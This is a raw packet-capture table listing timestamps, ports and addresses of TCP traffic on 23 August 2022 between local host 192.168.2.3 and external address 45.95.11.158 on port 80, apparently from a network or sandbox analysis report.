Aug 23, 2022 18:23:57.710959911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.710990906 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.714229107 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.714263916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.714288950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.714303970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.714370012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.716869116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.716937065 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.717356920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.717390060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.717407942 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.717411995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.717428923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.717452049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.727312088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.727380037 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.727490902 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.727534056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.727536917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.727560997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.727580070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.727607012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.728466988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.728511095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.728529930 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.728560925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.728598118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.728626013 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.728646040 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.728665113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.728672981 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.728707075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.728709936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.728744984 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.728749037 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.728787899 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.729464054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.729509115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.729522943 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.729548931 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.729556084 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.729590893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.729599953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.729629993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.729630947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.729665995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.729670048 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.729710102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.729711056 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.729748964 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.729942083 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.729981899 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.729995012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.730016947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.730030060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.730071068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.730154037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.730197906 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.730209112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.730252981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.730284929 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.730299950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.733949900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.733999968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734034061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734070063 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734080076 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734114885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734119892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734153986 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734157085 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734181881 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734205008 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734214067 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734225988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734247923 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734251976 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734282017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734287024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734316111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734319925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734349012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734379053 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734402895 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734426022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734428883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734467983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734493971 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734500885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734507084 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734534025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734539986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734566927 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734572887 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734600067 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734611988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734626055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734652996 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734658957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734688044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734697104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734725952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734760046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734769106 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734783888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734796047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734816074 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734818935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734848022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734855890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734884024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734890938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734906912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.734920979 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.734942913 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.736710072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.736790895 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.736845970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.736905098 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.736907959 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.736949921 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.736984015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.737035036 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.737087965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.737133026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.737179041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.737216949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.737229109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.737262964 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.737627983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.737665892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.737698078 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.737699986 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.737711906 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.737739086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.744379044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.744429111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.744446993 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.744472027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.744474888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.744512081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.744520903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.744554043 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.744553089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.744592905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.744599104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.744625092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.744636059 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.744664907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.744668007 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.744704008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.744713068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.744744062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.744744062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.744785070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.744801044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.744842052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.744858980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.744903088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.744905949 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.744939089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.744941950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.744982958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.745003939 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.745043039 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748184919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748260975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748285055 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748301029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748313904 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748337030 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748342037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748395920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748497009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748541117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748543978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748583078 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748591900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748622894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748641968 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748661995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748666048 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748704910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748704910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748743057 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748744011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748784065 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748785019 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748821974 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748822927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748861074 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748862982 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748898983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748903036 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748939037 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748941898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.748980045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.748981953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.749022961 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.749036074 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.749063969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.749089956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.749136925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.749144077 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.749182940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.749185085 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.749222994 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.749236107 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.749258995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.749264002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.749301910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.749305964 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.749339104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.749341011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.749377966 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.749377966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.749413967 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.749417067 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.749454975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.749455929 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.749494076 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.749495029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.749524117 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.749533892 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.749561071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.751482010 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.751530886 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.751538038 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.751568079 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.751570940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.751599073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.751611948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.751636028 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.757945061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.757992029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.758044004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.758044958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.758086920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.758089066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.758099079 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.758137941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.761390924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.761439085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.761488914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.761499882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.761528969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.761529922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.761539936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.761583090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.761816025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.761859894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.761877060 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.761912107 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.761960983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.762012959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.762193918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.762252092 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.762573957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.762644053 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.762645960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.762728930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.762757063 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.762778997 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.762788057 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.762846947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.763578892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.763694048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.763719082 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.763782024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.763798952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.763844967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.763856888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.763900042 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.763901949 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.763952017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.763958931 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.764008045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.764012098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.764045954 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.764065027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.764096022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.765978098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.766062975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.766083002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.766132116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.766146898 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.766206026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.766211033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.766263008 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.766283989 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.766325951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.766351938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.766376972 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.766381025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.766412973 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.766438007 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.766469955 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.767626047 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.767716885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.767750025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.767811060 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.768687010 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.768767118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.768773079 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.768821001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.768822908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.768873930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.768874884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.768925905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.769015074 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.769062042 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.769119978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.769171953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.769224882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.769234896 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.769298077 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.769340992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.769355059 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.769392014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.769395113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.769448042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.769503117 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.769546032 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.769561052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.769606113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.769633055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.769690037 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.769762993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.769818068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.769836903 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.769886971 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.769891024 CEST	49827	80	192.168.2.3	45.95.11.158
